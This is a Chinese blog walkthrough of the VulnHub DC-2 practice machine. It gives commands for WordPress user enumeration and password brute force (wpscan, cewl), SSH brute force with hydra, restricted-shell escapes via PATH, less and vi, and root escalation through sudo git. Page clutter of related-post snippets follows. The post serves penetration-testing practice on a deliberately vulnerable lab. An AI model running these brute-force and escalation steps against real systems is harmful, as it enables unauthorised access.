Vulnhub DC-2

最新推荐文章于 2024-05-13 16:31:06 发布
最新推荐文章于 2024-05-13 16:31:06 发布
阅读量187 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/114191793
版权

信息收集

arp扫内网
在这里插入图片描述
扫端口

nmap -A -p- -T4 192.168.1.139 -v

在这里插入图片描述
发现端口80和7744(ssh)

直接访问80端口会跳转,导致无法访问
kali修改hosts
在这里插入图片描述

漏洞利用

在这里插入图片描述
成功访问后到flag1

给了提示要用到cewl,cewl kali自带,用于爬行网站生成弱密码

cewl http://dc-2/ -w dc-2.txt

但是不知道用户名,先留着,
这里是wordpress框架,用wpscan(kali自带)爆出用户名

wpscan --url dc-2 -e u

在这里插入图片描述
爆出三个用户,在用cewl生成的字典进行密码爆破

wpscan --url http://dc-2 -P dc-2.txt -U admin

爆出来两个

tom/parturient jerry/adipiscing

dirb 扫目录

dirb http://dc-2

访问会直接跳转登录,拿上面账号登录
http://dc-2/wp-admin/user/

tom登录没东西
拿jerry登录

找到flag2
在这里插入图片描述
有个ssh,尝试爆破ssh

hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5

在这里插入图片描述
jerry爆破失败

tom登录成功,不能用cat
在这里插入图片描述
命令执行绕过
最终发现只能用less
在这里插入图片描述

看到提示
在这里插入图片描述
发现有个su,用su登录jerry,这里也不知道为啥,jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下
在这里插入图片描述
还是照着提示来,su不能用,要进行绕过

新东西

shell绕过限制

shell绕过限制学习
这里用修改环境变量的方法

export PATH=$PATH:/bin/   
export PATH=$PATH:/usr/bin

当然看到别的wp里还有别的手法,我个人没试出来

可使用less绕过:$less test    然后!'sh'
使用ls绕过:$man ls    然后!'sh'
使用vi绕过:$vi test    然后:!/bin/sh 或者 :!/bin/bash

即可绕过,然后flag4在jerry用户目录下
在这里插入图片描述

提权

提示提到了git,搜索git提权

切换jerry登录

sudo git help config
sudo git -p help
sudo git -p --help

成功提权
在这里插入图片描述

penson by 小乌
关注
VulnHub DC: 2 渗透测试
spider的博客
11-29 286
下载在虚拟机部署后 主机发现 flag1 nmap -sT -v 192.168.1.246 -sV -O -p- 我们在这发现开放了2个服务,直接访问80端口,发现重定向到域名/dc-2,去/etc/hosts 文件改一下就好。 打开页面,发现是一个wordpress的网站,发现flag1,提示用从cewl可以爬到密码 cewl http://dc-2 -w pwd.txt cat pwd.txt && wc -w pwd.txt cewl 密码长度可以指定的,得到一个238个密
VulnHub DC-1
weixin_45682839的博客
04-13 392
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
VulnHub DC-2
烟敛寒林的博客
09-07 381
前言 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机:DC2 (VirtualBox) IP:192.168.43.15 攻击机:Kali (VMware) IP:192.168.43.242 说明:同DC1,DC2需要找到5个flag 配置同DC-1 开始 首先查看kali的ip得到192.168.43.242 nmap查看靶机ip得到192.168.43.15 继续nmap嗅探靶机其余信息,发现开放...
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 595
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
vulnhub dc-2
qq_48318463的博客
05-13 685
vulnhub dc2 详细
vulnhub--DC2
weixin_55129870的博客
05-12 1352
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
VulnHub DC-2 Writeup
末初的CSDN博客
09-28 406
DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/ 靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103 攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 访问http://192.168.56.103发现被重定向到了
Vulnhub - DC-1
qq_46081990的博客
03-14 427
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub DC-5
Pai_Space
02-20 308
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 723
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2005
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3714
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机DC系列-DC-3.2
m0_54525483的博客
12-31 1230
Vulnhub靶机DC系列-DC-3.2 靶场名称:DC-2 下载地址: DC-3-2.zip (Size: 1005 MB) Download: http://www.five86.com/downloads/DC-3-2.zip Download (Mirror): https://download.vulnhub.com/dc/DC-3-2.zip Download (Torrent): https://download.vulnhub.com/dc/DC-3-2.zip.torrent ( Ma
智慧建造总体策划方案(76页).pptx
11-02
智慧建造总体策划方案(76页)
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件
11-02
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件,已在 windows、deepin linux 和树莓派上测试!
LLC simulink仿真《slx模型文件》
11-02
LLC simulink仿真《slx模型文件》 LLC谐振转换器是一种高效的直流-直流(DC-DC)电源转换器,因其独特的谐振特性而得名。在电力电子领域,LLC仿真对于理解和优化这种转换器的性能至关重要。Simulink是MATLAB环境下的一个强大工具,用于建立和仿真复杂系统,包括电力电子系统。 标题“LLC simulink仿真”指的是使用Simulink进行LLC谐振转换器的建模和仿真。通过Simulink,工程师可以模拟LLC转换器在不同工作条件下的行为,如负载变化、输入电压变动以及控制策略的影响。 **LLC电路的基本原理:** LLC谐振转换器结合了升压(Boost)、降压(Buck)和串联谐振(Series Resonant)三种拓扑结构的特点。它由主开关、副开关、电感、电容和二极管组成。谐振电容和电感形成谐振回路,使得开关器件能在零电压或零电流条件下切换,从而降低开关损耗并提高效率。 **仿真过程:** 在Simulink中,首先需要建立LLC转换器的模型,包括各个元件的参数设定。这包括主开关和副开关的开关频率、谐振电容和电感的值、二极管的反向恢复特性等。然后,设
krb5-devel-1.15.1-55.el7_9.i686.rpm
最新发布
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh krb5-devel-1.15.1-55.el7_9.i686.rpm
基于Matlab实现Stanley算法项目源码(下载即用)高分项目
11-02
基于Matlab实现Stanley算法项目源码(下载即用)高分项目,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值